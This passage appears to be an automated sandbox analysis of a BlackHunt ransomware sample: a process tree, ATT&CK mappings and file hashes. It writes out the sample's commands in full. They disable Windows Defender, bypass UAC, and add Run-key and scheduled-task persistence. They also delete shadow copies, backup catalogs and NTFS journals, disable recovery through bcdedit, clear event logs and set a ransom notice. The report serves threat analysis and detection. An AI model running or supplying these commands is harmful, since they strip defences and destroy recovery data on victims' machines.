2900 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 144 PID 2264 wrote to memory of 2708 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 55 PID 2264 wrote to memory of 2708 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 55 PID 2264 wrote to memory of 2708 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 55 PID 2264 wrote to memory of 2708 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 55 PID 2264 wrote to memory of 2608 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe"C:\Users\Admin\AppData\Local\Temp\6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2264 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2548 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1216 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2728
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2888
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2460
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2608
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2668
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2388
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:3044
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:112
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:812
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2936
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2856
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2896
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1816
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2928
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1680
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe" /F2⤵PID:1272
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe" /F3⤵
- Creates scheduled task(s)
PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2556
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1964
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:1792
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:268
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:656
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1092
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1496
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1876
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1684
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:844
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1988
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3544
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2800
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2144
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:4000
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:3016
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:1120
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:1616
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:1092
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1516
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3816
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2204
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:1820
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1020
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1540
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:2972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:1764
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1040
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2852
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1580
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1796
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:1220
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:324
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:204
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta"3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe"2⤵
- Deletes itself
PID:2932 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:232
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1724
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:1720
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
684B
MD543d77168151b3e8fb914afffbf7b8091
SHA1d8adc1ce058f6002d3a1c16a9b5ff14ea104f66f
SHA256b86ab4a5c6f58b480db7edbc1e9ea9ea022da517ee17649a37544ec7b0249bf7
SHA512e402c4741c929a42e293a15f8e0c6a8b353d5aca57d9cac92993be13730204549f3760a7772af5bc4f94f1f603ef69f71a8707ca547fbbb6a0085359209ef56f
-
Filesize
1KB
MD57338c7d6483268e9fcaa3e78de87a32c
SHA10232d1183654e310f48666084b9080d2d7047684
SHA256a787091e7e4a370ad6120a03bc7145cdcc2a36bd3d00baf46fba4b51c6af256d
SHA512fed269b5638b9144b62bbbae0c658c3f8e6eefc9510c6827cc92708beb7a77a9e635c06541470d83bb558cd36d20a46344ea2463021cb3b48f40aa0046642887
-
Filesize
12KB
MD5b0baf53c294224e6b3edb6fc34eaf75b
SHA1b26ac451db526c22d5c95878298360c6a95e5985
SHA2564c7e56a54347f8492236793d86ef6ae6486941253e9f12bb1810e9da56622745
SHA512b2268cff3d651b9df7e3d5e074bf183059a0771348bfb0a596da39b94781c8d12f4c0d2e5671ea4910288ec4d4e5d1181f079b63dd26abf3a186e6783b62840c